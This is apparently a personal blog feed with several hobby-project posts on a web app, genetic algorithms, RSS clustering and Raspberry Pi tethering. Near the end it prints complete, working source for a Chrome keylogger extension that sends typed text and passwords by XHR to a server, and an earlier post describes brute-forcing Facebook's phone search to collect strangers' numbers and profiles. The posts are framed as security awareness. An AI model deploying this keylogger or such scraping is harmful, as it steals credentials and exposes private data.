MicroAccounting Web App

This semester at the university I attended a course of web programming, and as part of the final exam I was asked to develop a web application. It would use a Java servlet hosted by the Google App Engine, and would store data to the Google’s Datastore.

I thought that it would be much more useful to make a mobile web app, which is something slightly more challenging which I didn’t practice a lot in the past.

The app goal is to track daily expenses, by providing a way to insert, edit and delete transactions.

Of course the whole project was basically boring (which is different than easy), so I decided to add a funny functionality: I included a QR code scanner to add transactions by automatically, simply scanning the related QR code.

In the end, it has been fun, and as usual I’m writing this blog post to keep track of my works.

A live version of the app is hosted by Google here.

A simple test Microaccounting Store which provides QR codes to test the app is here.

Facebook: searching people by phone number

Looking in the privacy settings of my Facebook profile, I discovered the option which indicates who can search you by the phone number you provided. The default setting is everyone.

Probably this option is intended for allowing users to match friends from the phonebook of their phones, but works in the desktop site too, by simply inserting the phone number in the searchbox. It works even if you have set your phone number to be private, it’s a different kind of option.

This is pretty similar to the kind of matching is made in WhatsApp or similar apps to find friends, but is completely different if you think that in those other services you cannot discover additional information like first and last name by providing the phone number, you just use the name you’re providing in your phonebook.

Using this Facebook feature lets you get a lot of information (Facebook’s public profile infos) by only providing the number of the person you’re interested in. That’s interesting.

Of course, to be searched this way, you need to have provided your number in some way to facebook. But this is more and more common, Facebook asks for it in various occasions, such as for the two step verification, and likely by using the mobile messenger app.

With that said, this service can be used to match unknown numbers, which is pretty useful [and a little creepy, if you think you can finally find out whose person number is being written in the toilette].

Interested by this possibility, I tried to brute-force the function to create an phonebook of random people from Facebook. I made a program which randomly tries a lot of numbers waiting for matches in the searchbox.

Actually, it worked pretty good, and I was able to retrieve like ~50 phone numbers and relative facebook profile by searching phone numbers similar to my own.

The program was set to run forever, but after a while Facebook noticed me that I was misusing their services, and asked me to enter a captcha to verify my humanity. 🙂

This method is probably not suitable for retrieving the phone numbers of every facebook user (actually I still think there’s a chance if you have a large number of fake Facebook accounts working simultaneously), but could be used by some spammers to find few random numbers and relative public information (likes, hometown, ecc) to perform some targeted advertising.

My very simple python script is bound to the italian version of Facebook, but is essentially very easy, uses Selenium webdrivers to login in Facebook and then search for numbers in the serachbox, looking for changes in the search suggestions to identify a match.

Since I don’t need people to get my Facebook friendship only because I’m in their phonebook, I changed the option value from everyone to friends.

JSGenetic library and new Genetic Environment implementation

I’ve created a little Genetic Algorithm library called JSGenetic, which takes care of the population management of a genetic algorithm.

As a test for this library, I’ve re-implemented an old project, the Genetic Environment, which is basically a simulation of an environment made by resources (water and food) which spontaneously grows or rains on the field, and by “animals”, which have a genetic code that specifies their behavior given what they see of the environment: they can actually “see” only north, south, east and west. The animals also have a little memory of 4 bits, and can understand if they are running out of water or food.

The genetic code of the animals is initially set to random, and is progressively processed by the genetic library which selects the individuals which survive more time.

After some generations, it’s clear that the individuals live longer because of the selection made on their genetic code, which defines how they behave.

The code of the JSGenetic library is on GitHub, and the live example of the code is on my github page at this address.

Hierarchical clustering of blog posts fetched through RSS Feed

Today I tried to implement a simple webapp which retrieves some RSS feeds from a given URL and then looks for the content and uses a hierarchial clustering classifier to cluster them in some kind of categories by content similarity.

Actually the implementation is really poor, and I’m not even sure it works. Anyway, it’s been long since I wanted try some kind of text classifier, and here we are. It extracts the text from the RSS feed, then indexes the words inside it and tries to use them as features for the algorithm. Short posts generally means bad results, especially without any kind of generalization (tokenization should be the word in this case) of the features. In fact, results are hardly understandable and I guess they’re random.

Anyway, here’s a list of what I (sort of) learned along the way:

  • what is hierarchical clustering (not how it works, though)
  • d3.js graph library basics (very basic basics)
  • how to use NetBeans to develop webapps

That’s not so bad for a spare afternoon&evening.

As I said, I didn’t implement the algorithm myself, but I used a library from github, clusterfck.
Oh and I also used the jFeed jQuery plugin for parsing the RSS, but I slightly modified it to fetch the content of the entries and not to crash trying to detect IE.

Here‘s the link.

Android USB tethering and the Raspberry PI

Here’s a post I made on the Google Plus Raspberry PI community back in the 2012. Reading this again I remembered how actually useful has been and I didn’t want to get it lost 🙂
It explains how to easily share the internet connection of your Android phone with the Raspberry PI.

“I want to share something i found very interesting and useful in my first tests with the PI.

If you want your PI to access the Internet without ethernet or even outdoor, you can connect it to your android phone (it may/should work with other phones too) with the USB-microUSB cable, and then activate the USB tethering on the phone. This shoud create a new interface usb0, and simply typing ‘sudo dhclient usb0’ on the PI should get the ip from phone and use it as router. It works with both 3G and wifi connection active on the phone.

It can be useful to previously edit /etc/network/interfaces adding the line 
“iface usb0 inet dhcp”
in order to make it automatically get the ip when you plug the usb cable and activate the tethering.

Once the PI is connected, you can also connect to it from the smartphone, via ssh or whatever you want, because the phone and the PI are actually connected with ethernet over usb.
To discover the PI’s ip from the phone, you should use apps like Fing for android scanning the network 192.168.42.0/24 which in my tests (with a Samsung Galaxy Note with ICS) was the network used by the phone’s dhcp after connecting it to the PI.

It’s been very useful in my tests because simply editing the interfaces file made me able to control the PI from the smartphone and have it connected to the Internet, without needing a PC to configure anything.

I even managed to run an X server on the phone to display the graphics of applications executed on the PI, even if it was quite slow.

Hope it helps, and sorry for my bad english.”

A thought (and proof-of-concept) about malicious Chrome extensions

Ok, today I made a simple Chrome extension, and suddenly got very excited about it (yeah I know, almost every blog post I write starts like this). Then reading about the extensions possibilities, I learned that the extensions are not limited by the same-origin policy.

This means that, if an extension made an AJAX request, it could be directed to a server different from the domain of the current page. This can be harmful in some different ways, the first I imagine is a simple keylogger extension which logs everything you type (passwords included) and sends it to a malicious server to collect them.

And that’s what I made, just to understand how difficult it was, and which kind of warning would the Google Web Store issue when you decide to add it to your browser.

Making the malicious extension

Actually, since that you can inject javascript, making the keylogger extension is straightforward: you just have to write two files, a manifest and the script:

manifest.json:

{
  "manifest_version": 2,
"name": "KeyLogger",
"description": "This extension logs everything you type.",
"version": "1.0.1",

"permissions": [
"http://*/*", "https://*/*"
],

"content_scripts": [{
"matches": ["http://*/*", "https://*/*"],
"js": ["script.js"]
}]
}

script.js:

var xmlhttp = new XMLHttpRequest();
console.log('Starting keylogger..')

setInterval( function() {

var inputs = document.getElementsByTagName('input')

var textAreas = document.getElementsByTagName('textarea')

var myLog = function(event) {
var what = encodeURIComponent(event.srcElement.value)

console.log("Logged: " + what)
console.log("Sending data to remote server..")
xmlhttp.open("GET","http://localhost/?"+what,true);
xmlhttp.send();
}

var getHandler = function(previousHandler,obj) {
return function(e) {
myLog(e);
if(previousHandler) previousHandler(e);
}
}

for(var i=0; i<inputs.length; i++) {
if(inputs[i].getAttribute('type') == 'text' || inputs[i].getAttribute('type') == 'password') {
inputs[i].onblur = getHandler(inputs[i].onblur,inputs[i])
}
}

for(var i=0; i<textAreas.length; i++) {
textAreas[i].onblur = getHandler(textAreas[i].onblur,textAreas[i])
}
},2000)

The script is a simple implementation that sends via AJAX requests every text you type in a textbox, password fields included. In this simple proof of concept it sends everything to localhost.

I tried it, and it works.

Installing the extension

 

I published it to the Chrome Web Store, and tried to install it, to see what kind of warning should show up, and all I got was this:

keyloggerwarning

 

..not so uncommon for, say, an Advertising blocking extension:

adblockpermissions

 

So this blog post is here to remind you that you should use only trusted Chrome extensions. It’s very easy to steal your data with a malicious chrome extension, it’s easy to hide some malicious code in a apparently innocent extensions and after you have installed it, it’s easy to forget about it.

Please don’t do bad things with my code and/or ideas.